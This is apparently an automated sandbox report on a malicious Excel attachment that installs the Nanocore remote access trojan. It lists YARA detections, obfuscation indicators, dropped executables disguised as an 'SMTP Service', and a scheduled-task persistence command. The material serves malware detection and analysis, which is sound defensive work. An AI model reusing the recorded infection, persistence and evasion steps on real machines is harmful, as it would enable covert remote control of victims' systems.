Source: Process Memory Space: smtpsvc.exe PID: 2264, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: smtpsvc.exe PID: 2264, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: vbc.exe PID: 2920, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: vbc.exe PID: 2920, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: vbc.exe PID: 2688, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: vbc.exe PID: 2688, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: smtpsvc.exe PID: 1336, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: smtpsvc.exe PID: 1336, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 8.2.vbc.exe.520000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.vbc.exe.520000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.vbc.exe.530000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.vbc.exe.530000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 8.2.vbc.exe.530000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.vbc.exe.530000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

.NET source code contains calls to encryption/decryption functions

Source: 8.2.vbc.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 8.2.vbc.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 8.2.vbc.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Classification label

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@15/11@2/3

Creates files inside the program directory

Source: C:\Users\Public\vbc.exe

File created: C:\Program Files (x86)\SMTP Service

Jump to behavior

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$PO-FRE590164.xlsx

Jump to behavior

Creates mutexes

Source: C:\Users\Public\vbc.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{b4dbb526-0da4-4453-8602-b00f5f7a8285}
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Mutant created: \Sessions\1\BaseNamedObjects\dbtwNmbxuXxomvAczU

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR8B7.tmp

Jump to behavior

Found command line output

Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ........................................(.P.............|.................................................................................$.....			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ...................... .........E.R.R.O.R.:. ...................T......................................................................... .....			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ...................... .........E.R.R.O.(.P.....................T.......................................................j.......h......... .....			Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample is known by Antivirus

Source: PO-FRE590164.xlsx	Virustotal: Detection: 34%
Source: PO-FRE590164.xlsx	ReversingLabs: Detection: 23%

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TrXHdHpWh' /XML 'C:\Users\user\AppData\Local\Temp\tmpD9BD.tmp'
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TrXHdHpWh' /XML 'C:\Users\user\AppData\Local\Temp\tmp1334.tmp'
Source: unknown	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TrXHdHpWh' /XML 'C:\Users\user\AppData\Local\Temp\tmpD9BD.tmp'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TrXHdHpWh' /XML 'C:\Users\user\AppData\Local\Temp\tmp1334.tmp'			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Submission file is bigger than most known malware samples

Source: PO-FRE590164.xlsx

Static file information: File size 2277376 > 1048576

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Document has a 'vbamacros' value indicative of goodware

Source: PO-FRE590164.xlsx

Initial sample: OLE indicators vbamacros = False

Document has an 'encrypted' value indicative of goodware

Source: PO-FRE590164.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

.NET source code contains potential unpacker

Source: 8.2.vbc.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.vbc.exe.400000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B879B push ecx; retf		4_2_002B879C
Source: C:\Users\Public\vbc.exe	Code function: 8_2_001EC990 push eax; iretd		8_2_001EC991
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 9_2_003F8572 pushad ; retf		9_2_003F8587
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 9_2_003F879B push ecx; retf		9_2_003F879C

Binary may include packed or encrypted code

Source: initial sample	Static PE information: section name: .text entropy: 7.47933743717
Source: initial sample	Static PE information: section name: .text entropy: 7.47933743717
Source: initial sample	Static PE information: section name: .text entropy: 7.47933743717
Source: initial sample	Static PE information: section name: .text entropy: 7.47933743717

.NET source code contains many randomly named methods

Source: 8.2.vbc.exe.400000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs

High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='

Source: 8.2.vbc.exe.400000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs

High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Vbb[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Roaming\TrXHdHpWh.exe			Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TrXHdHpWh' /XML 'C:\Users\user\AppData\Local\Temp\tmpD9BD.tmp'

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\Public\vbc.exe

File opened: C:\Users\Public\vbc.exe:Zone.Identifier read attributes | delete

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
